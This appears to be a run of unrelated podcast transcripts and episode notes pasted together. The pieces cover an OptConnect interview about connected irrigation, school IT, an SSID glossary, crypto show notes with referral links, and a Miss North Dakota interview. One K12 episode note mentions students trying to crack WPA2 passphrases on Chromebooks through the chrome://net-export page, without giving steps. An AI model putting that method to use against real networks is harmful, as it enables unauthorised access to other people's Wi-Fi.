manufacturers can't tell the user why. It's just offline. You know, you got to roll a truck out there. It could be, uh, the power's out. It could be it lost, uh, uh, the connection and it timed out. You got to roll your truck out there. And from what I've experienced using OpConnect, one of the greatest benefits is to be able to explain, help explain why the controller is offline. Because just because the controller is offline doesn't mean it lost its cellular connection. Your device could be still connected and it's a great way to troubleshoot that remotely. Justin: Yeah, absolutely. We're able to eliminate a lot of variables without having to roll that truck roll, which is very costly. Andy: Well, Chris, since we have you joining us today, I would love for you to share, you know, I guess as much as you are willing to share in terms of how OpConnect kind of, um, got started or sort of the foundation of OpConnect, you know, before you guys entered this industry, could you share a little bit about that? Chris: Sure. It's a, it's a good story. I'll see if I condense it, can condense it here for us. Uh, there's a really interesting part of this story, which is, uh, I think there was some timing involved here and being a little bit lucky and having some, uh, some insights that were coming. We really cut our teeth. In another industry, uh, not in, uh, in agriculture, if you will, or in irrigation, we actually cut our teeth over in the retail industry, which, uh, specifically we were serving locations that were unattended, such as kiosks, ATMs, and signage. And what we learned in that space is that connectivity was becoming increasingly important, more and more difficult to procure and less and less reliable for people that were doing it themselves. So we set out to Perfect. A solution that ultimately became OptConnect. And over the course of a few years, we refined that and product ties that in a way that allowed us to take that same solution to dozens of industries, which we do today, we take each of these industries serious. We try to serve those industries in meaningful capacities. We try to be good stewards and participants of trade shows and organizations. We try to be thought leaders or partner with thought leaders to help enable them. But really what we learned through it all is that we had an opportunity to become an expert at something everybody else took for granted or thought as an afterthought. Thanks to the advent of the iPhone, everybody thinks that IOT connectivity can be as simple as an out of the box, powered on, uh, walk away solution. And we know the reality is, we've worked very, very hard to make that experience true. But otherwise, it generally doesn't happen, or it certainly doesn't scale to that, that capacity. So, when we started, uh, serving these various industries, our goal was simple. We want to make a out of the box experience, make it as easy as possible for anybody in any industry. to open a device, plug it into power, hook up the antenna, plug in the Ethernet cable and walk away. 30 second install. Uh, or we're not doing it right. And I'll tell you, it's taken a team pretty significant team. Uh, you know, a long time to perfect that to make that a reality. And that's what we've done today. Uh, the company really has evolved over, over the last couple of years, but we've really hit a stride as well. And we know where we provide value. We know where we sit in the supply chain, if you will, of our customers and how critical internet connectivity is. And, uh, you know, we just come to work every day loving what we do. Andy: That's great. I love how you mentioned, I think you use the word unmanned devices, something to that effect, and I couldn't agree more because there's a difference between something working all the time, or let me step back, there's a difference between when something fails, but there's a dude one door down that can just go, you know, restart it versus something that's unmanned. When it's unmanned, it really needs to work all the time because there's nobody around to fix it. And I think that's a, that's a great differentiator. And if you can achieve, uh, you know, close to a hundred percent success and an unmanned environment, that's, Chris: that's amazing. Yeah. You know, that's, that's just the reality of, uh, of where we're headed today. And especially if you fast forward in the history of the company through the pandemic. We learned that a lot of businesses turned to technology when the workforce sort of dried up, if you will. They turned to connectivity as a means by which they could be in multiple places at once. Uh, we learned through the pandemic as a nation and as a world, the importance of connection. And we certainly learned in the business world the importance of connectivity and OpConnect serves that and sits directly in that value proposition of being able to allow our customers to magnify their efforts and to be in multiple places at once, if you will, by essentially replacing the man on the edge with a device that allows our customers to see what's going on. And, uh, to, to trust and know that somebody's behind the scenes making sure everything's working how it needs to all the time. That's fantastic. Andy: I'd like to ask if you're willing to share how you came to the company, Chris: Chris. Yeah, I, that's a great story. I've actually been here since the beginning, since day one. And, uh, I was in a, an adjacent market, if you will, uh, working. Happily in that market, when the opportunity came about to take this, what we call our proverbial duct tape solution of a router, this is in 2006 when IOT wasn't even a word, right? Yeah. If you will, or even M to M it was all. what we would call telemetry, uh, and pull that together. And over the course of a couple of months, what we found is that there was a solution out there for the oil and gas industry that allowed for that remote telemetry to be collected. via a cellular gateway and transmitted to the cloud, if you will. Uh, and I, I think even then calling in a cloud was a big stretch. Uh, like I think about today, right? Very, very expensive solution. So I set out to, to, to find a way to get the cost down and to productize that, to standardize on what we did. And, and about two years later, after having some. Pretty phenomenal success, just word of mouth. We made the strategic decision that, that this could not only be a product, but it could actually be a business. And not only could it be a business, it could serve dozens of industries. And not only could it serve dozens of industries, but we saw the writing on the wall years and years ago that we were going to be moving towards an ever connected world that relied on the ability to connect ubiquitously anywhere, almost anywhere that you are. There's, we call them cellular deserts. There's very few of those that exist in the country these days. Uh, you know, connectivity is essentially everywhere. And, uh, we set out to. Find a way to to meaningfully connect our customers to the Internet, uh, and it's just it's been a lot of fun. We have had so many extreme use cases and different examples of things that have come to us over the years. And, uh, you know, irrigation is just one of dozens, but a perfect example of where we can add value to something that may have had a legacy solution that's either old, decaying or going away. You know, radio controllers and, and, uh, you know, traditional, uh, boring of, uh, and laying cable and, and copper underground, you know, those are days of past and, uh, with everything moved to connectivity wirelessly or cellularly, you were, we're in a perfect position to help. Andy: So over the last 15 years, has it just been smooth sailing, easy peasy, lemon squeezy, the business just grew, or were there times when. It was tough going and you questioned whether you were making the right decisions with the company. I love to hear kind of how the progression went. Chris: Yeah, you know, as we look back, it's really clear to see that we've always been under some meaningful growth tension. Whether we recognized it in the moment or not, uh, there were always things that we were learning and adjusting. And I've always been fond of a business that can, can look back in retrospect and make a statement, uh, something that's happened in the past. And for us, I, it's very clear to see that there were a few pivotal, what I call DNA altering moments that were make or break, lay it all on the line, uh, opportunities for the company to go after. Uh, I remember. Uh, particularly a number of years ago, a situation that occurred globally on on the Internet. There was a a vulnerability introduced to the Internet called Heartbleed in 2014. OpConnect was not personally, uh, you know, affected by Heartbleed directly. We didn't have any vulnerabilities in our system and there was no data exfiltrations. We never got hacked like was happening everywhere. to major companies. Uh, you know, if you had a online log in with the whether it was to an email account or social media account, almost everything was vulnerable. But what we saw as a result were a number of inbound inquiries, uh, testing our systems to see if they were vulnerable. And it was breaking the system. It was causing things to not be able to get out. And that was a make or break moment for us where we had to make a couple of decisions to move forward. 40, 000 customers to a new platform that was protected behind a firewall. We had to do that in the course of a couple of hours, which was unprecedented. That was like a six or a nine month effort that we, we got done in about a little over 24 hours. It's amazing what you can actually Andy: do when you constrain time. Isn't it? Chris: Oh yeah, Andy: absolutely. You tell your team to do something and they're going to tell you, Oh, six months. And you say, no, can you do it in 24 hours? Like, it's just amazing when you layer time onto something. Chris: Yeah. We, we learned that we're best when our backs against the wall. That's when, when the best in us comes out. Uh, you know, and then fast forward a number of years, I think every organization went through this reflective moment as. The reality of the pandemic was setting in quickly and, uh, you know, as businesses were getting shut down and people were getting sent home, you know, we, we look at that very, uh, very fortuitously. We had months earlier made the decision to enable a remote workforce. Everybody had a laptop. We had already fully adopted technology that allowed us to stay connected. Through, uh, back office systems and, and, uh, zoom and teams and, uh, and think chats, uh, chat tools. So it was a seamless transition for us that allowed us to get to a position where we could be not reactive to the situation, but actually helpful to our customers that they were trying to navigate, you know, sending remote employees home and figuring out how to keep them connected. You know, we quickly developed a solution that allowed our customers to send their. cut their employees home using our connectivity so that they could stay connected, get their job done. Every day. So there's there. It certainly has not been smooth sailing, Andy, but as we look back, we are also grateful for those experiences because they're where we stretched and learned the most. We have a saying on our wall that alludes to the fact that stretching is while it might be painful, it's where we learn the most. We believe that learning happens on the edge. And if we can keep our company on that edge of learning and catastrophe, but always stay to this side of it, we're always going to be in a helpful growth position. Andy: Fantastic words of wisdom. Love that. Thank you for, thank you for sharing that. Thank you for giving us a little bit of a history of the company. And I think maybe since we have Five minutes or so left. You could tell us, uh, what's on the horizon. Let's assume you guys got great market share and irrigation. Everybody's using your product. What's Chris: next? You know, I love this question and I love to put it into perspective too. If we kind of zoom out of the business world and just look at what's happening globally, the electrification of everything, uh, connectivity, you know, I knew that we were onto something at OpConnect in the business world. When I got a phone call from my parents saying they have a washer and dryer that needs to connect to the internet and needed help, I thought, okay, there's, there's the rest of the world kind of catching up and making it here. But if we look at fast forward, there's a couple of macro trends that we look at that I think are really important. Number one is the importance of scarce resources. Uh, as a country, for example, uh, it happens to be raining outside for us today, yesterday, we got an entire summer's worth of rain and about four hours, uh, people tend to think of water as free cause it falls from the sky. We know better if we look and step back. It's a scarce resource. We need to manage it appropriately. Where else does that happen? Well, it happens with energy. It happens, uh, in, in a number of, of different, uh, industries. It's going to happen with electricity. So if we can identify these macro trends. That are likely to either get regulated or just out of necessity be managed differently, and we can position ourselves to help facilitate the collection of data to help customers make actionable real time decisions that can be our guiding star on where we take the company next, um, as Thank you The world connects EVs. We're going to have to do that really smartly. There's just not enough electricity to supply. If you were to replace every, every internal combustion engine with electric vehicles today, we would be kind of crippled, if you will, as a nation. So we, that has to be built out as that's built out. It needs to be managed differently. It needs to be monitored. Uh, there may be times where it may need to be routed, certainly needs to be secure. So we know that's a macro trend that we can look at, uh, that will help, uh, drive, you know, not only growth, but meaningful adoption of connectivity and technology that allows us to use our resources better. We look at things like security, all types of applications of security, you know, regrettably, we live in a world where Where that is more important than it's perhaps ever been. There are more and more assets being deployed to more and more unattended locations that are vulnerable to various types of nefarious activity. Those need to be protected. They need to be monitored and, uh, and managed accordingly. So those, those are some of the ways that we try to think about. You know, macro tailwinds that could help guide us long term as an organization. Now, by no means does that mean we're willing to turn our back on some of the industries that we serve today. In fact, our plan is to continue to land and serve those industries long term, be experts, become a trusted household name, if you will. Um, the the OptConnected and the Kleenex of the of the world, if you will. And, uh, and that's our goal to just provide meaningful connectivity anywhere possible. It's great, Andy: uh, great plan and I think you guys are well on the way. I know I certainly trust your devices because I've used them and have experienced with them and the people that I've suggested to use them feel exactly the same way. It's kind of like once somebody tries one, they go, all right, I'm just using this. For all my stuff. I don't, I don't want to have to worry about brand manufacturer, ABCD ease devices. I just want one portfolio with all my devices. So I appreciate what you guys are doing and I appreciate how it is also kind of raising the bar in our industry and providing, you know, more contractors with more access to technology so that they can learn faster and maybe to use your words, you know, run their business on the edge a little bit as well. Absolutely. Awesome. Well, thank you guys so much. Uh, we are running out of time and Justin, maybe on another, maybe we can do a, a sequel to the second episode and talk a little bit more about some particular, some other industries that, um, that you're involved with that are also, you know, water related, looking Justin: forward to it. Andy, thanks for having us Andy: back. Thank you very Chris: much.
Chris is on leave again this week, so Mark and Josh do their best to proceed without him. Mark recaps the K12 SIX Conference that was held in Austin, Texas. Josh talks about trying to change a SSID over to WPA3 and it did not go well. They also talk about a new method students are using to attempt to crack WPA2 passphrases on Chromebooks using the chrome://net-export page. The majority of this episode is an interview that Chris and Mark conducted with Mr. Doug Levin, founder of K12 SIX. Doug sat down with the guys to talk about what K12 SIX offers to districts and what the goal of the conference is. LISTEN HERE (and on all major podcast platforms). Hang out with us at K12TechPro.com Buy our merch!!! Vizor - 20% Off Fortinet - Email fortinetpodcast@fortinet.com SomethingCool.com - Cybersecurity Solutions Extreme Networks - Email dmayer@extremenetworks.com Provision Data Solutions Oh, and... Email us at k12techtalk@gmail.com Tweet us @k12techtalkpod Visit our LinkedIn page HERE Reddit
Nirvánia után, trekkie vagy trekker, hard sci-fi, nemváltás bemondásra, elfogulatlan sportkommentátorok, vicces SSID-k, ChatGPT a majmok helyett, mesefigurákról elnevezett közterületek, afrikai futók, nektarinlekvár, Smarter Everyday és a Saturn V, mi az az államcsőd, dr. előtag, airpods copy, osztályozható zenék, rózsalekvár, Hi Ren, alkohol betiltása, CSRM-es sör, chatGPT a súlytalansági disznóvágásról, Lagrange pont pontossága, első randin túrázni, kolbásztok köszönés hiánya, vidékizés és cigányozás, karácsonykor CSRM-et hallgatni, Horvátország is banán alakú, utolsó kérdés, Majka bátor-e, vért adni pénzért, lesz-e videós CSRM, mire hasonlít az új magyar rendszám, üzemanyag pisztoly működése, jobbkormányos kishajók, "th" kiejtése, palacsinta két oldala, vaslemez a sütőbe, páramentesítő szappan, zsibbasztó telefonálás, Gustaf Dalén Nobel-díjas gázszerelő. Zenék: Nagyúr - Sarkok számlálása; Nunki Bay Starship - Monkeys --- Send in a voice message: https://podcasters.spotify.com/pod/show/csunyarosszmajom/message
The name of a wireless access point. CyberWire Glossary link. Audio reference link: SSID Management - CompTIA Security+ SY0-401: 1.5, Professor Messer, uploaded August 3rd, 2014.
Quantmas Eve 2022! Our Quantmas present is here! In the very first episode of Season 2, we immediately tackle all the FUD and drama of the past two months. How did Quant do this year and what happened when we were offline? There is a lot to discuss so tune in and get quamfy again! $QNT #QRC21 00:00:00 Introduction 00:09:45 2022 in review; Quant advent, Oracle, UST, Tokenise, QRC721/QRC20 00:17:00 LacChain implications 00:19:00 UST $QNT partnership 00:23:00 How do we define company success? 00:31:30 $QNT tokenomics e-mails and their response 00:37:00 LUNA debacle and fallout 00:38:40 Exchange drama's explained and the implications for your assets. 00:55:00 SSID and implications for crypto custody 00:59:00 QNT Price Action and history 01:08:00 CBDCs, Project Hamilton completed?! 1.84M transactions/sec 01:32:30 Post-SIBOS Interview Andrew, Martin, Gilbert 01:35:00 Merry Quantmas! Looking back at 2022 https://quant.network/news/a-look-back-at-2022/ DNB (De Nederlandsche Bank) geeft waarschuwing voor Kucoin! https://bitcoinmagazine.nl/nieuws/dnb-waarschuwt-voor-cryptobeurs-kucoin Conor @jconorgrogan over Mazar's audits of Binance, Kucoin, and CryptoCom are no longer online. “All links return an error and have been down for 24+ hours. A search for "Binance" on Mazar's website yields nothing reserve-related” https://twitter.com/jconorgrogan/status/1603593037652836352?t=saHaOROeh9yXxjtkmho_zQ&s=35 Mazars Auditing group https://www.mazars.com/ UST partnership! https://quant.network/news/quant-partners-with-ust-to-offer-institutional-digital-assets/ The ECB makes clear it will not know who, how much or where people spend, so stop the anti-CBDC hysteria!!! https://www.linkedin.com/posts/turrin_ecb-digital-euro-progress-report-2-activity-7011656047740293120-hV-n/?utm_source=share&utm_medium=member_android OpenCBDC to process 1.84M transactions per second as Boston Fed, MIT collab is complete https://twitter.com/digitalpoundfdn/status/1606067919317831681 "If we'd had central bank digital currencies in 2008, we probably wouldn't have had the financial crisis," says our Founder and CEO @gverdian https://twitter.com/quant_network/status/1606276113151541250?t=j1E7pxRCJmsrk23sluOVRA&s=35 https://quant.network/perspectives/watch-quant-ceo-and-cpo-on-the-future-of-institutional-digital-assets/ QNT price https://www.coingecko.com/ The Quamfy Show Website https://www.thequamfyshow.com Quanterscan Https://www.Quanterscan.com Quant Library https://t.me/quantlibrary Do you want to help support the show? We created an Ethereum address for donations. 0xbDd1C73408E1E0ae165cA73AFB5F2E64E886AE37 https://www.thequamfyshow.com Musical theme by: General: Every Thursday, at 18:00 CET, a new Quamfy Show! All you need to know about the Quamfy Lifestyle, but made simple! Musical Them by AlexiAction from Pixabay We are on: * Twitter https://twitter.com/TheQuamfyShow * Instagram https://www.instagram.com/quant.updates * Google Podcast https://podcasts.google.com/feed/aHR0cHM6Ly9mZWVkLnBvZGJlYW4uY29tL3RoZXF1YW1meXNob3cvZmVlZC54bWw * Spotify https://open.spotify.com/show/6HECh06D8iZr2ogbZiPJsS?si=97ae6b68fe284030 * YouTube https://www.youtube.com/c/TheQuamfyShow * Amazon/Alexa https://music.amazon.com/podcasts/dee55663-4ff8-49fb-a4b5-65182d8531e8 * Podbean https://thequamfyshow.podbean.com/ #QRC21 The International Quamfy community: * NL/BE Quant Group https://t.me/Dutchqnt * $Counchill$ of Quamf - FA ALL DAY https://t.me/counchill * Quamfy Lounge (Price chat) https://t.me/QUAMFYLOUNGE_2 * Council of Quamf - QNT fundamental analysis https://t.me/councilofquamf * Community DAO https://t.me/QNTDAO * QNT Trading & On Chain Analysis https://t.me/QNTTrading Official Channels: * Quant Community Channel “Main” https://t.me/QuantOverledger * Website: https://www.quant.network * GitHub: http://www.github.com/quantnetwork * Twitter: https://twitter.com/quant_network Our Exchanges and Brokers: * Coinmetro: https://coinmetro.com/?ref=jarno * Unizen: https://trade.unizen.io/account/signup?ref=6UT2HC39 * Bitcoinmeester: https://www.bitcoinmeester.nl/?r=100077550 * Bitvavo: https://bitvavo.com/?a=03889DE34C * Crypto .com https://crypto.com/app/2enw9fc23d * Coinbase https://www.coinbase.com/join/de%20sno_s #QRC21
The name of a wireless access point. CyberWire Glossary link. Audio reference link: SSID Management - CompTIA Security+ SY0-401: 1.5, Professor Messer, uploaded August 3rd, 2014. Learn more about your ad choices. Visit megaphone.fm/adchoices
Shownotes Multiple BSSID sets out to aggregate individual beacon frames from an access point to a single beacon frame. It helps solve the issue of beacon overhead. As it is today, each SSID broadcasts a beacon. The more SSIDs you're broadcasting, the more the beacons eat up airtime. Airtime is a precious resource for Wi-Fi […] The post CTS 306: Multiple-BSSID appeared first on Clear To Send.
In this episode, PT student and Miss North Dakota 2022, Sidni Kast, talks about her journey to becoming a PT and being Miss North Dakota. Today, Sidni talks about the Miss America Organization, the One Body Movement, and going through Miss America orientation. How does Sidni balance her job as Miss North Dakota while completing her studies? Hear about Sidni's devotion to self-care, the value that Miss America can provide to young girls, and get Sidni's advice to her younger self, all on today's episode of The Healthy, Wealthy & Smart Podcast. Key Takeaways “Whatever your dreams are, and whatever you want to achieve, as long as you set your mind to it, then you can achieve those goals.” “No matter what age, we can accomplish whatever we want to.” “Stop trying to speed through every part of your journey.” More about Sidni Kast Sidni Kast is a second year graduate student at the University of North Dakota pursuing her doctorate in physical therapy. While attaining this goal, she has decided to make an impact on her community as the current Miss North Dakota 2022. Her platform as Miss North Dakota, the One Body Movement, correlates perfectly with the profession of PT and grants Sidni the opportunity to speak to people all over her state, and on a national level when she competes at Miss America in December 2022 in Connecticut. The focus of the One Body Movement is to preach the importance of overall health, and not just how people look on the outside; mind, body, and soul all play a major role in our quality of life. Sidni plans to speak to people of all ages on this matter, as she sees its importance for every demographic, especially after the isolation our communities underwent during the pandemic. Although, it can be challenging to balance these two time-demanding endeavors, Sidni finds the enthusiasm she has for both outlets as her motivation to continue her pursuit of success. Suggested Keywords Healthy, Wealthy, Smart, Physiotherapy, Miss America, Scholarship, Success, Opportunity, Impact, Advocacy, Inclusion, To learn more, follow Sidni at: Email: Sidnikast@gmail.com Instagram: @sidnikast @missamericand Facebook: @missnorthdakota2022 Subscribe to Healthy, Wealthy & Smart: Website: https://podcast.healthywealthysmart.com Apple Podcasts: https://podcasts.apple.com/us/podcast/healthy-wealthy-smart/id532717264 Spotify: https://open.spotify.com/show/6ELmKwE4mSZXBB8TiQvp73 SoundCloud: https://soundcloud.com/healthywealthysmart Stitcher: https://www.stitcher.com/show/healthy-wealthy-smart iHeart Radio: https://www.iheart.com/podcast/263-healthy-wealthy-smart-27628927 Read the Full Transcript Here: 00:03 Hi, everyone. Welcome to another episode of the healthy, wealthy and smart podcast. I'm your guest host today Stephanie y rock, I am joined by Karen Litzy, who is the primary host of this podcast. And today we're interviewing Sydney cast. And Sidney is the current Miss North Dakota 2022. But she's also a doctor physical therapy candidate at the University of North Dakota School of Medicine and Health Sciences. And so she's joining us today. Hi, Sydney. Welcome to the show. 00:33 Hello, thank you so much for having me. 00:36 So tell us a little bit about yourself. And tell us kind of your connection between being a physical therapy student and being Miss North Dakota and what that all entails. 00:47 My name is Sidney Cass, and I'm currently a student at the University of North Dakota, I have loved going to school there. And the best part is that it's still kind of close to home. So I'm originally from Minot, North Dakota, which is about three hours from Grand Forks. And that is where I grew up and really found my passion for what I wanted to do with my life. And that was physical therapy, I applied after, you know, I'm really glad that I waited after COVID Before I started my education, because that's really helped me get a good experience and really gotten that hands on experience. So I'm very happy with that decision. But ya know, so went to U n, d. And then I started my kind of connection with the Miss America organization before I got to u and d. And that was back in 2019. So it's very new to me personally, I didn't grow up, you know, Toddlers and Tiaras or anything like that. But I really found a passion for it, because it allowed me to get scholarship money. And it allowed me to perform once again, because I did choir and theater all throughout growing up. And once I was done with high school, I really didn't have that opportunity anymore. So that's what led me to join the organization. And it has truly been life changing ever since not only becoming Miss North Dakota, but meeting all of the different people and having new experiences has truly shaped how I go about my everyday life. And I'm so thankful that I'm able to combine my doctorate of physical therapy, and also my job as Miss North Dakota into one. 02:19 So you know, people have heard of pageants before. And there's lots of different types of Miss North Dakota as a person can be. Tell us about the Miss America organization and how it's different from some of the other pageants or organizations that we're aware of like Miss Universe, tell us a little bit about the organization and why it's unique to you. 02:38 So the best thing about any type of these organizations is you make it your own. For instance, what I do is Miss North Dakota is completely different than the previous minutes North Dakota has done and that's okay. That's the best part is it can evolve as we evolve. And what I love about the Miss America organization is it truly honors scholarship. And that is the base of everything they do. Whether it's fundraising, or it's different events, scholarship is the base of what they prioritize. So that kind of is what allows me to that is why I chose that organization over other ones, I probably wouldn't have done another organization because I had that preconceived notion of what a pageant was. And it is so much more than the stereotypes. And it's, it's hard to explain that to a lot of people because they grew up oh, well, Miss America, it's just a beauty competition. And that is the furthest thing from what it really is going to and we'll talk about this later, I just went to my Miss America organized orientation. And that was so uplifting because I wasn't the only one trying to push an issue that I saw was important and was something I saw our nation needed. Every single candidate going for the job of Miss America has something unique, that allows her to show her passions and really provide an insight to what she believes needs to be changed in our country. 04:05 Yeah, I've always said, this is kind of a disclaimer to our listeners. I was also involved in Miss America organization, and competed in Miss North Dakota back in my younger days. And one of the unique things that I thought besides of course, the scholarship money which did help pay for my PT school was that you have to have a platform and you dedicate your entire year as Miss North Dakota or if you're a local title holder, to helping people understand that platform and raising awareness. So Sydney one of the things that I think is great about your platform is it is very much related to your future job as a physical therapist. Can you tell us about your platform give us a little bit more detail and what inspired that platform. 04:54 My platform is called the one body movement and what inspired that entire thing is, being in physical therapy, there are so many things about the body that connect to one another. And Mind Body Soul is really the root of what I'm after. And what I want to preach to not only the state of North Dakota, but hopefully the entire country that we have to take care of ourselves, and invest in our bodies in entirety, in order to thrive and have a greater quality of life, which, as physical therapists we know is the number one thing we're looking to improve. So having both that connection to my current my future career, and also being able to show that on a state platform is something I'm truly excited about. And I feel when I talk about it, you can sense I'm excited about it. And not all things, when people go into these different outlets, you can see that passion, I feel like I'm able to have that passion for it. 05:53 Yeah, and I think that that's something that we talk about a lot on this podcast is that mind body connection and understanding how everything is connected. I know that as a physical therapist, I do that every single day with my patients. And it's unique that you have this statewide platform where you can, as I like to say, preach the gospel of physical therapy, to especially young kids, you know, there's one thing that we want people to do is to grow up and be physically active and to move their bodies, and to practice habits so that they can have health, healthy lives as they get older. What are your plans as Miss North Dakota to kind of spread this message across the state. 06:39 So my way of, I think the best way to spread knowledge is through stories. And I can definitely relate to when I was growing up, I thought, Uh, well, in order to be successful, I have to look a certain way I have to come from a certain background. And I want to tell people throughout the state that that's not true. Whatever your dreams are, and whatever you want to achieve, as long as you set your mind to it, and know, this is why I want to do it, then you can achieve those goals. Whether it's your overall fitness, whether it's your mental health, or whether it's, you know, the job you want to attain, anything that you want in life is, is under your control. So being able to speak through my own stories, whether it's different diet cultures that we all experience, or social media, how it really affects different generations is how I would love to connect to others, and portray what I believe we need to move past. 07:36 And what types of things do you plan to utilize from your education to kind of help spread some of those messages? 07:41 Oh, absolutely. That's, that's the best part about all of this, every day, I'm learning something new, that I can relate to what I want to share. I kind of talked about this, the last time we spoke, but an example of when I talk to a class is I'll have four guests come up. And you know, I like to have a little classroom involvement, whether it's a school presentation, or whatnot. And all four of those guests will represent the parts of a car, four different tires. And those four different parts of the car, or the tires each represent a part of our lives. And it can be different for each person. Because as we all know, we come from different walks of life. For myself, personally, one tire would be my physical health, the next tire my mental health, and then my school and social my school and work life, and then my social life. Because as we know, those are all different parts of our lives that directly affect us what and what I would demonstrate to those people is those tires like on a car, if one goes flat, the car won't move forward. So we have to give energy and input input to each different outlet, if we want that car to move forward. But like, unlike a car, you can replace the tires, you can't replace your body. And that's why I really focus on the one body movement as a whole and really, like trying to inspire others that we have to invest in every little part and not just you know, inflate one tire. 09:13 I love that story. I think that that makes that that's something that people can really everybody has seen a car. Yeah, everybody's probably experienced a flat tire. So it's, Oh, I understand. And I think, you know, one of the things that is that I think you can definitely apply to when you become a physical therapist is our patients also respond to metaphors. And speaking in metaphors helps them understand like, why am I in pain, what is going on with my body and makes everything a lot less scary to them, especially if you can give them something that they can see that they understand the story that they understand. So I love that you're doing that. You had said that you just got back from Miss America orientation. then. Yeah. So tell us about that Miss America is happening in December. Correct. So tell us about the orientation process and what the contestants were that you met there. 10:13 Yeah, orientation for Miss America is both one of the most exciting, but also the most overwhelming things I've ever, like witnessed. And the reason I say that is, I'm a very like, extrovert, and you're going in and meeting 50 other women that are also extroverts and also accent Yeah. So it's a lot. And it's a lot of, you know, high energy. People that really just want to get to know you. And that I mean, the first few days, you're just really having that small talk really like, Oh, hey, like, where are you from? It's you walk up to somewhere like Sydney, North Dakota, nice to meet you. And it's so cool, because you can you can see that everyone's excited to be there and get to know one another. And that's what I really love about the Miss America organization. It's so uplifting and empowering and everyone wants the other to succeed. It's not that you know, Catty, 80s movie, we're Oh, no, we're, you know, we're in a pageant we have to compete. It's it's so much more than that. 11:19 Are you talking about drop dead gorgeous, because it's the greatest pageant movie of all time, in my opinion. Maybe Miss Congeniality? Yeah, no, 11:28 I was gonna say those two movies, they're at their high competitors. I love watching those movies, because it's so fun to compare it to real life situations. But other stuff that happened at the orientation was the teen competition. So there's a whole Miss America, like women, part of the competition, and then there's the team portion. So I actually got to watch my team. And it's so amazing to see women, the ages between 14 and 18 to 19. Show such poise and grace. And I'm sitting there thinking I was taking speech class, when they went in there on a national stage presenting in front of stars, I mean, me of Franklin, Michael Phelps, his wife, Monica, from cheer, I don't know if you've watched that on Netflix, but just, you know, to be at that age, and to handle that situation just shows the preparation that the Miss America organization gives young women. And then after the team competition was when we really got into orientation. And let me tell you read every contract before you sign it. Because there's no, it was the funniest part, we all showed up. And we had our contracts pre signed, and you know, you know how contracts work, you might skim a few. But there are some important things in there that are about the Miss America organization that you really have to pay attention to. And I don't believe I'm at liberty to discuss that. But there's a lot that there's so many logistics, some things I would never even imagine. But the best part was getting to talk to the current Miss America, and hear how she's handling her year. And you'd be amazed at the life that they live and what they have to endure in order to be this, you know, the face of Miss America. And it's my favorite part was listening to how she coped with the stress and how she really took time for herself in order to succeed at that role, because it is time consuming, and it is overbearing, some days. But you could tell she took the steps to handle her situations. And overall, the experience was wonderful. I'm so happy to have met the women now and not at Miss America in December because I just think that would have been way too much to handle. 13:50 Well, you know, you talked about Miss America not being able to handle a lot you are going to PT school and you have u of n you have the full time job of being Miss North Dakota, which, you know, if our listeners aren't, aren't familiar with what it's like to be in the Miss America organization, when you're a state title holder, you are that is literally your job, you are going and doing public speaking engagements nearly every single day during your year. So how are you balancing all of this? We have a lot of physical therapy students that listen to this podcast, we have a lot of people who are working their normal jobs and going home and maybe doing a side hustle or parenting who are probably wondering like, wow, how are you doing it? So tell us how you're handling everything. 14:38 Yeah, the two biggest things I would say our communication with both organizations, and also self care, those those things are my like golden rule and no matter what I'm doing because the communication part, whether it's talking with my manager who books me for all the events I go to, or talking to, for instance, Cyndi Flom, who is in charge of all my PT scheduling, being able to communicate with them and tell them when I need to be where I need to be, is utmost most important thing for me and something, I really have to, you know, hone in on because I am in a generation where emails are not prioritized. And I know that I know that's a flaw of mine is answering emails, but it's something I'm working on and able to admit. And the next thing that really has helped me get through not only my first year of PT school, but this summer since becoming Miss North Dakota, alongside of PT school, is taking time for myself when I need it. And I know so many people forget to do that. And when we're constantly baring our souls into one thing, and not taking time to whether it's read a book, or watch a movie, take a walk with your friends, or, you know, just take time for yourself is my number one thing and not only taking time for yourself, but not feeling anxious, while you're taking your time. Well, I could be doing this, I could be doing that. But really taking it in and fully relaxing. And then moving on to whatever to do list you may have. 16:17 I totally agree with you. And I remember when I was a student, and I would go out and do something fun, I would think oh my god, I should be studying for that test. I should be doing this. So like, how do you do that? I mean, how do you let go of that anxiety? When in devote that full time to that self care or to the present? What advice do you have for people for that? 16:41 Number one, set your phone down? I think our phones control our lives. And that's, you know, that's an ongoing battle we all face because well, what if I want to call someone like maybe that's my free time, do that. But saying you're out with friends, just put your phone aside and relax in that moment. Because when those like dings come up your notifications, that's when you're like, Okay, I should get back to this. But being present in those moments and fully diving into them is my number one advice. I love my, my time to myself is when I go workout. And I just you know, turn the tunes up, listen to a podcast, whatever it may be. And that's I just remind myself, this is my me time. And you know, whatever comes in, I tried to set it aside, but really just relaxing in those moments and reminding yourself it's okay to take this break, because that is what is going to lead to your success and survival. And whatever it is that you're anxious about. 17:42 I appreciate that a lot. I feel like I've learned to live in the moment a lot more since I've become a parent. I was definitely not I was definitely not an in the moment kind of person. I had some areas, somebody who was in the moment to help teach me that. And then I had to become a parent to really actually do that. So you're way ahead of me know, oh, I Lycos. I couldn't even 18:05 keep a dog alive at this point. So you know, what you do is amazing. And you should recognize that whenever you can possibly. 18:14 What are you most excited about for Miss America? And maybe tell us a little bit about I mean, I know you haven't gone to Miss America yet. But you did go to orientation. What's that? What's what's a typical Miss America competition? Like, from what you know? What are you most excited about? 18:32 Well, if you asked me before last week, I'd say I'm most excited about meeting all of the candidates because that is where you truly that is the best takeaway from any Miss America experience I think you have is friendships. And I have gotten to meet those girls and have formed those connections. Now I'm most excited probably for the competition part, but specifically the talent portion. And the reason that's sort of on my mind right now is we actually get to turn in our talent request form this in the next few days. And how that works is you just submit whatever song talent, dance you plan to do. And they tell you, Okay, you can do it. Or they say, Oh, another person has that. Well, let's rock paper scissors to see who gets it sort of thing. So I'm so excited to do that. Because my talent is really where I get to express myself in a way other than words can allow. And what I do is I play piano and sing. And I did that at the state level. And I ended up getting the top talent and top vocal award which I'm so, so proud of because growing up I thought I was good at singing. But it's not until you have that stage moment that gives you the confidence and the validation that what you're doing is really what you were meant to do. So being able to do that. And then also, that will be the moment I get to talk about this platform on a national stage. And if given the opportunity to make Top 15 Because that's how it works. You have two nights in prelims. And then one night of finals, and in finals is where they cut you down to 15. And if I were to be able to that top 15 and really get to speak about my passions and speak for the physical therapy community, that would be a life changing no matter what place I ended up in, just being able to share my stories and my passions would be something I just, I can barely find words to form, but I would be so excited for that opportunity. 20:33 Oh, we would love to hear you talk about physical therapy on a national stage. Yeah, I think that I think that you'll have you'll definitely have at least 100,000 APTA members rootin, for you for one thing, and then those people who maybe are physical therapists from around the world or maybe not APTA members, hopefully they'll hear 